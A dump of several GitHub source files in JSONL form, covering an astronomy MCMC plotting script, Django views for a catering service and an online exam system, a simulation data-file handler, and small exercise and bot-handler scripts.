period_10th_pctl,\n yerr = e_period_10th_pctl,\n teff_min = 5000,\n teff_max = 6250)\n\n\ndef rossby_plot(teff_bin_centers, flat_samples_10, flat_samples_90):\n \n y10 = period_10th_pctl\n y90 = period_90th_pctl\n \n yerr10 = e_period_10th_pctl\n yerr90 = e_period_90th_pctl\n \n ro10 = np.median(flat_samples_10[:,0])\n ro90 = np.median(flat_samples_90[:,0])\n \n model_10 = constant_rossby(teff_bin_centers, ro10)\n frac_resid_10 = 100*(y10-model_10)/y10\n \n fmed_10 = np.median(flat_samples_10[:,1])\n sigma_10 = np.sqrt(yerr10**2 + model_10**2 * fmed_10**2)\n \n model_90 = constant_rossby(teff_bin_centers, ro90)\n frac_resid_90 = 100*(y90-model_90)/y90\n \n fmed_90 = np.median(flat_samples_90[:,1])\n sigma_90 = np.sqrt(yerr90**2 + model_90**2 * fmed_90**2) \n \n sns.set(font_scale=1.4, context=\"paper\", style=\"ticks\")\n sns.set_palette(\"Blues\")\n\n teff_bin_centers = np.arange(4000,7020,20) \n\n fig = plt.figure(figsize=(6,8))\n ax1 = plt.subplot2grid((5, 3), (0, 0), colspan=3, rowspan=2)\n ax2 = plt.subplot2grid((5, 3), (2, 0), colspan=3, rowspan=2)\n ax3 = plt.subplot2grid((5, 3), (4, 0), colspan=3, rowspan=1)\n\n\n sns.kdeplot(\n x=lam[\"Teff_lam\"], \n y=lam[\"Prot\"], \n fill=True, \n bw_adjust=0.5,\n ax=ax1\n )\n\n ax1.errorbar(teff_bin_centers, period_90th_pctl, yerr=e_period_90th_pctl, fmt='.', color='k', ms=6, alpha=0.9, label='90th percentile')\n ax1.errorbar(teff_bin_centers, period_10th_pctl, yerr=e_period_10th_pctl, fmt='.', color='k', mfc='white', ms=6, alpha=0.9, label='10th percentile', lw=0.25)\n ax1.errorbar(teff_bin_centers, period_10th_pctl, yerr=e_period_10th_pctl, fmt='.', color='white', mfc='white', ms=2, alpha=0.9, lw=0)\n ax1.set_ylim(0,40)\n ax1.legend()\n\n _teff = np.linspace(4000,7000,1000)\n\n\n for i,_ro in enumerate([3,ro90,0.75,ro10]):\n ax2.plot(_teff, constant_rossby(_teff, _ro), label='Ro = '+\"{:.2f}\".format(_ro), lw=3, alpha=1)\n\n\n ax2.errorbar(teff_bin_centers, period_90th_pctl, yerr=e_period_90th_pctl, fmt='.', color='k', ms=6, alpha=0.9)\n ax2.errorbar(teff_bin_centers, period_10th_pctl, yerr=e_period_10th_pctl, fmt='.', color='k', mfc='white', ms=6, alpha=0.9, lw=0.25)\n ax2.errorbar(teff_bin_centers, period_10th_pctl, yerr=e_period_10th_pctl, fmt='.', color='white', mfc='white', ms=2, alpha=0.9, lw=0)\n \n ax2.semilogy()\n ax2.set_ylim(0.1,100)\n ax2.set_yticks([0.1,1,10,100])\n ax2.set_yticklabels(['0.1','1','10','100'])\n ax2.legend()\n\n for ax in [ax1,ax2]:\n ax.set_xlabel(\"Effective temperature [K]\")\n ax.set_ylabel(\"Rotation period [d]\")\n ax.set_xlim(7000,4500) \n\n ax3.errorbar(teff_bin_centers, frac_resid_90, yerr=sigma_90, fmt='.', color='k', ms=6)\n ax3.errorbar(teff_bin_centers, frac_resid_10, yerr=sigma_10, fmt='.', color='k', mfc='white', ms=6) \n ax3.set_xlim(7000,4500)\n ax3.set_ylim(-50,50)\n ax3.axhline(0, color='k', ls='--')\n ax3.set_xlabel(\"Effective temperature [K]\")\n ax3.set_ylabel(\"Residuals [%]\")\n\n #sns.despine()\n plt.tight_layout()\n plt.savefig(paths.figures / 'mcmc.pdf')\n \n return\n\nrossby_plot(teff_bin_centers, flat_samples_10, flat_samples_90)\n\n\n\n","repo_name":"trevordavid/rossby-ridge","sub_path":"src/scripts/mcmc.py","file_name":"mcmc.py","file_ext":"py","file_size_in_byte":12261,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"27159435597","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom signup.models import SignupCateringService, SignupMahalService, SignupCateringBoy, SignupCustomer\nfrom home_catboy.models import CBorders\nfrom django.core.paginator import PageNotAnInteger,Paginator,EmptyPage\nfrom .models import *\nimport uuid, json\nfrom datetime import time, datetime\nfrom django.template.defaulttags import register\nfrom django.core.files.storage import FileSystemStorage\nfrom django.views.decorators.cache import never_cache\n\n@register.filter\ndef string(value):\n return str(value)\n\n@register.filter\ndef get_range(value):\n return range(value)\n\n@register.filter\ndef get_pos(value):\n return int( value.split('.')[0][-1])+1\n\n@register.filter\ndef set_value(value):\n return 0\n\n@register.filter\ndef incre(value):\n return value+str(1)\n\n@register.filter\ndef test_range(value):\n return value<=5\n\n@register.filter\ndef list_to_string(val):\n return ', '.join(val)\n\ndef gallery(request, id):\n try:\n if request.session[str(id)]:\n dic=dict(SignupCateringService.objects.get(pk=id))\n if CateringGallery.objects.filter(id=id).exists():\n dic['gallery']=dict(CateringGallery.objects.get(id=id))\n return render(request, 'home_catering/gallery.html', dic)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n\ndef addgallery(request, id):\n if request.method==\"POST\":\n try:\n img = request.FILES['imgs']\n \n user_name=SignupCateringService.objects.get(id =id).name\n fs = FileSystemStorage(location='media/gallery/catering/'+user_name)\n ext = img.name.split('.')[-1]\n\n if not(CateringGallery.objects.filter(pk=id).exists()):\n fs.save(user_name+str(0)+'.'+ext, img)\n pic_insert= '/media/gallery/catering/'+user_name+'/'+user_name+str(0)+'.'+ext\n CateringGallery.objects.create(id=id, gallery_pic=[pic_insert])\n else:\n obj=CateringGallery.objects.get(pk=id)\n len_obj=len(obj.gallery_pic)\n pos_value=[]\n for x in obj.gallery_pic:\n pos_value.append(int(x.split('.')[0][-1]))\n\n if len_obj<6:\n for x in range(len_obj+1):\n if x not in pos_value:\n fs.save(user_name+str(x)+'.'+ext, img)\n pic_insert= '/media/gallery/catering/'+user_name+'/'+user_name+str(x)+'.'+ext\n break\n \n CateringGallery.objects(id=id).update(gallery_pic__append=[pic_insert])\n \n return redirect('cateringgallery', id=id)\n except:\n return redirect('cateringgallery', id=id)\n else:\n return redirect('cateringgallery', id=id)\n\ndef delete(request, id, pos):\n user=SignupCateringService.objects.get(id =id)\n fs = FileSystemStorage(location='media/gallery/catering/'+user.name)\n gallery= CateringGallery.objects.get(id =id)\n pic_img=gallery.gallery_pic\n z=0\n for x in pic_img:\n if pos == int(x.split('.')[0][-1]):\n del_name=x.split('/')[-1]\n pic_img.pop(z)\n break\n z+=1\n gallery.update(gallery_pic=pic_img)\n fs.delete(del_name)\n return redirect('cateringgallery', id=id)\n\ndef home(request, id): \n try:\n if request.session[str(id)]:\n\n dic=dict(SignupCateringService.objects.get(pk= id))\n\n dic['names']=json.dumps([x.name for x in SignupCateringBoy.objects.all()])\n dic['home']='home'\n dic['current_catering']=[]\n hist_obj= CateringBoyOrder.objects.filter(cid=id)\n if hist_obj.exists():\n for obj in hist_obj:\n details=dict(obj) \n ss=str(details['timing']).split(\":\")\n details['time']=time(int(ss[0]),int(ss[1])).strftime('%I:%M %p')\n if details['catboy_max']<1:\n details['count_empty']=1\n dic['current_catering'].append(details)\n dic['current_catering'].sort(key=lambda xx:xx['date'])\n dic['list_catboy']=list(SignupCateringBoy.objects.all().limit(2))\n\n dic['current_request']=[]\n for x in CateringServiceOrder.objects.filter(receiver_id=id):\n dic['current_request'].append(x)\n\n dic['current_request'].sort(key=lambda xx:xx['date'])\n return render(request, 'home_catering/home.html', dic)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n\ndef order(request, id):\n try:\n if request.session[str(id)]:\n a=dict(SignupCateringService.objects.get(id=id)) \n request.session['catering']=1\n return render(request, 'home_catering/order.html', a)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n\ndef createOrder(request, id):\n if request.method=='POST':\n add= request.POST['add']\n city= request.POST['city']\n pincode= request.POST['pincode']\n catboy= request.POST['nocatboy']\n amount= request.POST['amount']\n date= request.POST['date']\n time= request.POST['time']\n mobile=str(request.POST['mobile'])\n phone =str(request.POST['phone'])\n orderid= uuid.uuid4()\n \n CateringBoyOrder.objects.create(id= orderid,cid=id,amount=amount,date=date, timing=time, catboy_max=catboy,\n venue={'address':add+','+city+','+pincode,'mobile':mobile, 'phone':phone, 'location':city},count=catboy,\n )\n return redirect('homecatering', id=id)\n else:\n return redirect('cateringorder', id=id)\n\ndef dictProdSum(dic):\n sum_ = 0 \n for list_ in dic:\n prod=1\n for val in list_:\n prod*=val\n sum_+=prod\n return sum_\n\ndef foodList(request, id):\n try:\n if request.session[str(id)]:\n dic ={\"id\":id}\n if CateringBreakfast.objects.filter(pk=id).exists():\n dic['mrng_veg']= CateringBreakfast.objects.get(pk=id).foods\n \n dic['mrng_veg_total']=dictProdSum(dic['mrng_veg'].values())\n\n if CateringLunchVeg.objects.filter(pk=id).exists():\n dic['lunch_veg']= CateringLunchVeg.objects.get(pk=id).foods\n \n dic['lunch_veg_total']=dictProdSum(dic['lunch_veg'].values())\n \n if CateringLunchNonveg.objects.filter(pk=id).exists():\n dic['lunch_non']= CateringLunchNonveg.objects.get(pk=id).foods\n \n dic['lunch_non_total']=dictProdSum(dic['lunch_non'].values())\n \n if CateringDinnerVeg.objects.filter(pk=id).exists():\n dic['dinner_veg']= CateringDinnerVeg.objects.get(pk=id).foods\n \n dic['dinner_veg_total']=dictProdSum(dic['dinner_veg'].values())\n \n if CateringDinnerNonveg.objects.filter(pk=id).exists():\n dic['dinner_non']= CateringDinnerNonveg.objects.get(pk=id).foods\n \n dic['dinner_non_total']=dictProdSum(dic['dinner_non'].values())\n\n return render(request, 'home_catering/foodlist.html', dic)\n\n else:\n return redirect('login')\n except:\n return redirect('logout', service=id)\n\ndef addBreakfast(request, id):\n foodname =request.POST['foodname']\n foodprice = request.POST['foodprice']\n foodcount= request.POST['foodcount']\n\n if not(CateringBreakfast.objects.filter(pk=id).exists()):\n CateringBreakfast.objects.create(id = id, foods={ foodname: [foodprice,foodcount]})\n \n else:\n CateringBreakfast.objects(pk=id).update(foods__add={foodname: [foodprice,foodcount] })\n \n return redirect('createfoodlist', id=id)\n\ndef addLunchVeg(request, id):\n foodname =request.POST['foodname']\n foodprice = request.POST['foodprice']\n foodcount= request.POST['foodcount']\n\n if not(CateringLunchVeg.objects.filter(pk=id).exists()):\n CateringLunchVeg.objects.create(id = id, foods={foodname: [foodprice,foodcount]})\n \n else:\n CateringLunchVeg.objects(pk=id).update(foods__add={foodname: [foodprice,foodcount]})\n \n return redirect('createfoodlist', id=id)\n\ndef addLunchNonVeg(request, id):\n foodname =request.POST['foodname']\n foodprice = request.POST['foodprice']\n foodcount= request.POST['foodcount']\n\n if not(CateringLunchNonveg.objects.filter(pk=id).exists()):\n CateringLunchNonveg.objects.create(id = id, foods={foodname: [foodprice,foodcount]})\n \n else:\n CateringLunchNonveg.objects(pk=id).update(foods__add={foodname: [foodprice,foodcount]})\n \n return redirect('createfoodlist', id=id)\n\ndef addDinnerVeg(request, id):\n foodname =request.POST['foodname']\n foodprice = request.POST['foodprice']\n foodcount= request.POST['foodcount']\n\n if not(CateringDinnerVeg.objects.filter(pk=id).exists()):\n CateringDinnerVeg.objects.create(id = id, foods={foodname: [foodprice,foodcount]})\n \n else:\n CateringDinnerVeg.objects(pk=id).update(foods__add={foodname: [foodprice,foodcount]})\n \n return redirect('createfoodlist', id=id)\n\ndef addDinnerNonVeg(request, id):\n foodname =request.POST['foodname']\n foodprice = request.POST['foodprice']\n foodcount= request.POST['foodcount']\n\n if not(CateringDinnerNonveg.objects.filter(pk=id).exists()):\n CateringDinnerNonveg.objects.create(id = id, foods={foodname: [foodprice,foodcount]})\n \n else:\n CateringDinnerNonveg.objects(pk=id).update(foods__add={foodname: [foodprice,foodcount]})\n \n return redirect('createfoodlist', id=id)\n\ndef deleteBreakfast(request, id, value):\n CateringBreakfast.objects(pk=id).update(foods__remove={value})\n return redirect('createfoodlist', id=id)\n\ndef deleteLunchVeg(request, id, value):\n CateringLunchVeg.objects(pk=id).update(foods__remove={value})\n return redirect('createfoodlist', id=id)\n\ndef deleteLunchNonVeg(request, id, value):\n CateringLunchNonveg.objects(pk=id).update(foods__remove={value})\n return redirect('createfoodlist', id=id)\n\ndef deleteDinnerVeg(request, id, value):\n CateringDinnerVeg.objects(pk=id).update(foods__remove={value})\n return redirect('createfoodlist', id=id)\n\ndef deleteDinnerNonVeg(request, id, value):\n CateringDinnerNonveg.objects(pk=id).update(foods__remove={value})\n return redirect('createfoodlist', id=id)\n\ndef viewOrder(request, id):\n try:\n if request.session[str(id)]:\n dic=dict(SignupCateringService.objects.get(pk=id))\n dic['current_catering']=[]\n hist_obj= CateringBoyOrder.objects.filter(cid=id)\n if hist_obj.exists():\n for obj in hist_obj:\n details=dict(obj) \n ss=str(details['timing']).split(\":\")\n details['time']=time(int(ss[0]),int(ss[1])).strftime('%I:%M %p')\n if details['catboy_max']<1:\n details['count_empty']=1\n dic['current_catering'].append(details)\n dic['current_catering'].sort(key=lambda xx:xx['date'])\n\n dic['service_book']=[]\n for x in CateringServiceOrder.objects.filter(receiver_id=id):\n dic['service_book'].append(x)\n\n dic['service_book'].sort(key=lambda xx:xx['date'])\n\n return render(request, 'home_catering/vieworders.html', dic)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n\ndef viewServiceOrder(request, id, cid, type, date):\n try:\n if request.session[str(id)]:\n objects= CateringServiceOrder.objects.get(receiver_id=id ,booker_id =cid, reg_type=type, date=date)\n dic = {'id': id}\n dic['obj']=dict(objects)\n if SignupMahalService.objects.filter(pk=objects.booker_id).exists():\n dic['rev']=dict(SignupMahalService.objects.get(pk=objects.booker_id))\n \n elif SignupCustomer.objects.filter(pk=objects.booker_id).exists():\n dic['rev']=dict(SignupCustomer.objects.get(pk=objects.booker_id))\n\n dic['per']=dic['obj']['amount']//dic['obj']['plates']\n return render(request, 'home_catering/viewrequest.html', dic)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n\ndef acceptRequest(request, id, cid, type, date):\n objects= CateringServiceOrder.objects.get(receiver_id=id ,booker_id =cid, reg_type=type, date=date)\n objects.update(status=\"accept\")\n return redirect('viewcateringrequest', id=id, cid=cid, type=type, date=date)\n\ndef cancelRequest(request, id, cid, type, date):\n objects= CateringServiceOrder.objects.get(receiver_id=id ,booker_id =cid, reg_type=type, date=date)\n objects.update(status=\"cancel\")\n return redirect('viewcateringrequest', id=id, cid=cid, type=type, date=date)\n\ndef viewCatboyrequest(request, id, oid):\n try:\n if request.session[str(id)]:\n hist_obj= CBorders.objects.filter(oid=oid)\n dic={}\n dic['list_pending']=[]\n dic['list_accept']=[]\n dic['empty']=0\n if hist_obj.exists():\n dic['empty']=1\n for obj in hist_obj:\n if obj.status=='pending':\n x=dict(SignupCateringBoy.objects.get(pk=obj.cbid))\n x['date']=obj.date\n dic['list_pending'].append(x)\n else:\n x=dict(SignupCateringBoy.objects.get(pk=obj.cbid))\n x['date']=obj.date\n x['status']=obj.status\n dic['list_accept'].append(x)\n \n dic['id']=id\n dic['oid']=oid\n return render(request,'home_catering/viewcatboyrequest.html', dic)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n \ndef acceptCatboyrequest(request, id, cid, oid, date):\n obj_status=CBorders.objects.get(cbid=cid, oid=oid, date=date)\n obj_cbcount= CateringBoyOrder.objects.get(pk=oid)\n \n obj_status.update(status='accept')\n obj_cbcount.update(catboy_max= obj_cbcount.catboy_max -1)\n if obj_cbcount.catboy_max==1:\n CBorders.objects.filter(oid=oid, status='pending').delete()\n\n return redirect('viewcatboyrequestbycatering', id=id,oid = oid)\n\ndef completeCatboyrequest(request, id, cid, oid, date):\n obj_status=CBorders.objects.get(cbid=cid, oid=oid, date=date)\n \n obj_status.update(status='complete')\n return redirect('viewcatboyrequestbycatering', id=id,oid = oid)\n\ndef history(request, id):\n try:\n if request.session[str(id)]:\n hist_catboy= CateringBoyOrder.objects.filter(cid=id)\n dic={'id':id}\n dic['catboy_order']=[]\n \n for hist in hist_catboy:\n details=dict(hist) \n ss=str(details['timing']).split(\":\")\n details['time']=time(int(ss[0]),int(ss[1])).strftime('%I:%M %p')\n dic['catboy_order'].append(details)\n\n hist_request= CateringServiceOrder.objects.filter(receiver_id=id) \n dic['request']=[] \n for hist in hist_request:\n if hist.status==\"complete\":\n dic['request'].append(hist)\n return render(request,'home_catering/history.html', dic)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n \ndef earnings(request, id):\n try:\n if request.session[str(id)]:\n dic={'id':id}\n\n hist_request= CateringServiceOrder.objects.filter(receiver_id=id) \n total=0\n dic['request']=[] \n for hist in hist_request:\n if hist.status==\"complete\":\n total+=hist.amount\n dic['request'].append(hist)\n dic['total']=total\n return render(request,'home_catering/earning.html', dic)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n\ndef searchCatboy(search):\n search_list=[] \n list_value=SignupCateringBoy.objects.all()\n for value in list_value:\n if search.lower() in value.name.lower():\n search_list.append(dict(value))\n return search_list\n\ndef searchCatboyList(request,id):\n try:\n if request.session[str(id)]:\n search_list={}\n try:\n search=request.POST['q']\n request.session[str(id)]={'search':search}\n except:\n search=request.session[str(id)]['search']\n\n \n pag= request.GET.get('page_catering',1)\n\n pagnator=Paginator(searchCatboy(search),1)\n try:\n des=pagnator.page(pag)\n except PageNotAnInteger:\n des=pagnator.page(1)\n except EmptyPage:\n des=pagnator.page(pagnator.num_pages)\n\n search_list['catering']=des\n \n search_list['id']=id\n search_list['search']=search\n return render(request, 'home_catering/viewcatboy.html', search_list)\n \n else:\n \n return redirect('login')\n except:\n return redirect('logout', service=id)\n\ndef viewCatboyList(request, id):\n try:\n if request.session[str(id)]:\n search_list={}\n \n \n pag= request.GET.get('page_catering',1)\n\n pagnator=Paginator(SignupCateringBoy.objects.all(),1)\n try:\n des=pagnator.page(pag)\n except PageNotAnInteger:\n des=pagnator.page(1)\n except EmptyPage:\n des=pagnator.page(pagnator.num_pages)\n\n search_list['catering']= des\n search_list['search']=''\n search_list['id']=id\n return render(request, 'home_catering/viewcatboy.html', search_list)\n \n else:\n \n return redirect('login')\n except:\n return redirect('logout', service=id)\n\n","repo_name":"ilmnmukesh/Cassandra-django_CMS","sub_path":"home_catering/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18610,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"34147259356","text":"from logging.config import valid_ident\r\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\r\nfrom django.shortcuts import render,redirect\r\nfrom django.urls import reverse\r\nfrom .models import Admin, Staff,Student, User,question_paper\r\nimport random\r\nfrom django.contrib.auth import authenticate, login, logout\r\nfrom django.contrib import messages\r\nfrom .forms import AddStudentForm\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\n\r\ndef AdminLoginPage(request):\r\n return render(request,\"Admin/admin_login_page.html\")\r\n\r\n@login_required\r\ndef admin_home(request):\r\n staff_count = Staff.objects.all().count()\r\n student_count = Student.objects.all().count()\r\n question_count = question_paper.objects.all().count()\r\n return render(request, 'Admin/admin_home.html',{\"staff_count\":staff_count,\"student_count\":student_count,\"question_count\":question_count})\r\n\r\n@login_required\r\ndef admin_staff_view(request):\r\n staffs=Staff.objects.all() \r\n staff_name_list=[]\r\n for staff in staffs:\r\n staff_name_list.append(staff.admin.username)\r\n \r\n return render(request, 'Admin/admin_staff_view.html',{ 'staff_list':staffs})\r\n\r\n@login_required\r\ndef admin_student_view(request):\r\n students=Student.objects.all()\r\n student_name_list=[]\r\n\r\n for student in students:\r\n student_name_list.append(student.admin.username)\r\n return render(request, 'Admin/admin_student_view.html', {'student_list':students})\r\n\r\n@login_required\r\ndef delete(request, id):\r\n staff = User.objects.get(id=id)\r\n staff.delete()\r\n return redirect('admin_staff_view')\r\n\r\n@login_required\r\ndef add_student(request):\r\n form=AddStudentForm()\r\n return render(request,\"Admin/add_student_form.html\",{\"form\":form})\r\n\r\n@login_required\r\ndef add_student_save(request):\r\n if request.method!=\"POST\":\r\n return HttpResponse(\"Method Not Allowed\")\r\n else:\r\n form=AddStudentForm(request.POST)\r\n if form.is_valid():\r\n first_name=form.cleaned_data[\"first_name\"]\r\n last_name=form.cleaned_data[\"last_name\"]\r\n username=form.cleaned_data[\"username\"]\r\n email=form.cleaned_data[\"email\"]\r\n password=form.cleaned_data[\"password\"]\r\n address=form.cleaned_data[\"address\"]\r\n gender=form.cleaned_data[\"gender\"]\r\n section=form.cleaned_data[\"section\"]\r\n\r\n try:\r\n user=User.objects.create_user(username=username,password=password,email=email,last_name=last_name,first_name=first_name,user_type=3)\r\n user.student.address=address\r\n user.student.gender=gender\r\n user.student.section=section\r\n user.save()\r\n messages.success(request,\"Successfully Added Student\")\r\n return HttpResponseRedirect(reverse(\"add_student_form\"))\r\n except:\r\n messages.error(request,\"Failed to Add Student\")\r\n return HttpResponseRedirect(reverse(\"add_student_form\"))\r\n else:\r\n form=AddStudentForm(request.POST)\r\n return render(request, \"Admin/add_student_form.html\", {\"form\": form})\r\n@login_required\r\ndef question_upload(request):\r\n return render(request, 'Admin/question_upload.html')\r\n\r\n\r\n@login_required\r\ndef question_paper_save(request):\r\n if request.method!=\"POST\":\r\n return HttpResponse(\"Method Not Allowed\")\r\n else:\r\n question_name = request.POST.get(\"question_name\")\r\n paper = request.POST.get(\"url\")\r\n\r\n try:\r\n question = question_paper.objects.create(question_name=question_name,paper=paper)\r\n question.save\r\n messages.success(request,\"Successfully Added\")\r\n return HttpResponseRedirect(reverse(\"question_upload\"))\r\n except:\r\n messages.error(request,\"Failed to Create Admin\")\r\n return HttpResponseRedirect(reverse(\"question_upload\"))\r\n\r\n\r\n@csrf_exempt\r\ndef check_username_exist(request):\r\n username=request.POST.get(\"username\")\r\n user_obj=User.objects.filter(username=username).exists()\r\n if user_obj:\r\n return HttpResponse(True)\r\n else:\r\n return HttpResponse(False)\r\n\r\n@csrf_exempt\r\ndef check_email_exist(request):\r\n email=request.POST.get(\"email\")\r\n user_obj=User.objects.filter(email=email).exists()\r\n if user_obj:\r\n return HttpResponse(True)\r\n else:\r\n return HttpResponse(False)\r\n\r\n\r\n\r\n# @login_required\r\n# def random_question(request):\r\n# test = question_paper.objects.all()\r\n# paper_list = []\r\n# for i in test:\r\n# i= i.paper\r\n# paper_list.append(i)\r\n# print(paper_list)\r\n\r\n# mode = random.choice(paper_list)\r\n# print(mode)\r\n# # return mode\r\n# return render(request,'baseapp/admin_home.html',{'test':mode})\r\n\r\n@login_required\r\ndef random_question(request):\r\n test = question_paper.objects.all()\r\n paper_list = []\r\n for i in test:\r\n i= i.paper\r\n paper_list.append(i)\r\n print(paper_list)\r\n\r\n mode = random.choice(paper_list)\r\n # print(mode)\r\n return mode \r\n\r\n","repo_name":"Deepak-28/Online-Examination-System","sub_path":"onlineExam/examapp/Adminviews.py","file_name":"Adminviews.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"18817339319","text":"\"\"\"\nFile used to handle the data files created with Interacting_particles\nThe json file will be as followed:\n{\n\"parameters\": {\n\"N\": N,\n\"N_p: N_p,\n\"dt\": dt,\n\"theta\": theta,\n\"betas\": [beta_1, ..., beta_2],\n},\n\"data_points\": {\n\"beta_1\": [(time, mean) ...],\n\"beta_2\": [(time, mean) ...],\n...\n}\n}\nNumber of {\n\"time\"\n\"means\"\n} is decided by the user\n\nReturns the betas that have not been computed in the data file\nTODO: Having the last points if we want to continue simulation?\n\"\"\"\nimport json\nimport numpy as np\nimport os\n\n\ndef createFile(file_path, N, N_p, dt, θ, γ, ε, βs):\n \"\"\"\n Creates .json file if it doesn't exist, and initialize it\n \"\"\"\n # -----Parameters-----\n data = {}\n data[\"parameters\"] = {\n \"N\": N,\n \"N_p\": N_p,\n \"dt\": dt,\n \"theta\": θ,\n \"gamma\": γ,\n \"epsilon\": ε,\n \"betas\": list(βs)\n }\n data[\"data_points\"] = {\n f\"{β}\": [\n # each tuple will be (time, mean)\n ]\n for β in βs}\n\n with open(file_path, \"w\") as file:\n json.dump(data, file, indent=4)\n\n return βs\n\n\ndef updateFile(file_path, N, N_p, dt, θ, γ, ε, βs):\n \"\"\"\n Checking if the parameters are the same \n and returnin the new betas that must be computed \n \"\"\"\n\n # -----Loading-----\n with open(file_path, \"r\") as file:\n data = json.load(file)\n param = data[\"parameters\"]\n\n # -----Assert parameters-----\n # Checking if same parameters\n N, _N_p, _dt, _θ, _γ, _ε, _βs = param[\"N\"], param[\"N_p\"], param[\"dt\"], param[\"theta\"], param[\"gamma\"], param[\"epsilon\"], param[\"betas\"]\n assert (N, _N_p, _dt, _θ, _γ, _ε) == (\n N, N_p, dt, θ, γ, ε), f\"File with same name exist, but hyper parameters not the same. Please check values in file at {file_path}\"\n \n βs_union = np.union1d(βs, _βs).tolist()\n new_βs = np.setdiff1d(βs, _βs).tolist()\n param[\"betas\"] = βs_union\n\n with open(file_path, \"w\") as file:\n json.dump(data, file, indent=4)\n\n return new_βs\n\n\ndef checkFile(file_path, N, N_p, dt, θ, γ, ε, βs):\n \"\"\"\n This checks if the data file already exists.\n It will search locally for a Data/file_name.json file and create\n folders and file if they don't exist\n\n If file already exists, checks which methods, N and sigmas have been done\n and update the file with new parameters\n\n Returns a matrix of index for every method and N to specify which sigma hasn't been computed\n\n N.B.: If the sigmas are updated, the computation will be for all the Ns (new and already done) for consistency\n \"\"\"\n\n if not os.path.isfile(file_path):\n # If there is no file, create it and set parameters in it\n\n return createFile(file_path, N, N_p, dt, θ, γ, ε, βs)\n\n else:\n # If there is a file update it with new parameters\n\n return updateFile(file_path, N, N_p, dt, θ, γ, ε, βs)\n","repo_name":"Moddac/IC-Internship-Bifurcation","sub_path":"FileHandler_MCMC.py","file_name":"FileHandler_MCMC.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"10746096542","text":"lista= list()\n\na = int(input('Digite o primeiro número: '))\nb = int(input('Digite o segundo número: '))\nc = int(input('Digite o terceiro número: '))\n\nordemcre = [a, b, c]\n\nprint(\"Ordem crescente dos valores\", sorted(ordemcre))\n#ou\n\n#for c in range(0,3):\n\n# n =int(input(\"digite um valor: \"))\n# if c == 0 or n > lista[-1]:\n# lista.append(n)\n# else:\n# pos = 0\n# while pos < len(lista):\n# if n <= lista[pos]:\n# lista.insert(pos, n)\n# break\n# pos +=1\n#print(\"-=\" * 30)\n#print(f\"os valores diogitaos em ordem foram a çista{lista}\") ","repo_name":"Natan-333/Python","sub_path":"EX28.py","file_name":"EX28.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73333761422","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def oddEvenList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n if not head or not head.next or not head.next.next:\n return head\n \n even_head = even_curr = head.next\n odd_curr, curr, even = head, head.next.next, False\n while curr:\n if even:\n even_curr.next, even_curr = curr, curr\n else:\n odd_curr.next, odd_curr = curr, curr\n even, curr = not even, curr.next\n \n odd_curr.next, even_curr.next = even_head, None\n return head","repo_name":"adnanyaqoobvirk/leetcode","sub_path":"328-odd-even-linked-list/328-odd-even-linked-list.py","file_name":"328-odd-even-linked-list.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6701770245","text":"\"\"\"\nМодуль для обработки любых текстовых сообщений не попавших под критерии описанные ранее.\n\"\"\"\n\nfrom telebot.types import Message\n\nfrom loader import bot\n\n\n@bot.message_handler(content_types=['text'])\ndef other_commands_handler(message: Message) -> None:\n \"\"\"\n Функция срабатывает при получении текстового сообщения, которое не смогли обработать хендлеры ранее.\n\n :param message:\n :return:\n \"\"\"\n\n bot.send_message(message.chat.id, 'К сожалению я не распознал вашу команду,\\n'\n 'пожалуйста, повторите ввод либо воспользуйтесь '\n '/help или меню.')\n","repo_name":"AlexDubonosov/telegram_bot_currency_rate_searcher","sub_path":"handlers/standart/unknown_message.py","file_name":"unknown_message.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70688256142","text":"import Environment\nimport Progaming\nimport numpy as np\n'''\n根据论文所述\n1:需要获得一个H的矩阵\n\n'''\n\n#用户数目\nuser_number = 4\n\n#每个信道的用户数目\nusers_prechannel = 2\n\n# 带宽 MHZ\nBandWidth = 5\n\n# 信道数目\nband_number = user_number/users_prechannel\n\n# 每个信道的带宽\nSC_bandwidth = BandWidth/band_number\n\n\ndef H_and_h(user_number,band_number):\n '''\n 产生H和h的函数\n :param user_number: 用户数目\n :param band_number: 信道数目\n :return: H和h\n '''\n # H是一个矩阵\n H = np.zeros([user_number, band_number])\n h = np.zeros([user_number, band_number])\n # 产生每一个H的区别在于其距离,所有要生成其距离\n for i in range(user_number):\n distance = (500 - 50) * np.random.random_sample() + 50 # 距离是在50-500m中的任意一个位置\n for j in range(band_number):\n user_channel = Environment.environment(distance, SC_bandwidth)\n H[i][j] = user_channel.H\n h[i][j] = user_channel.h\n return 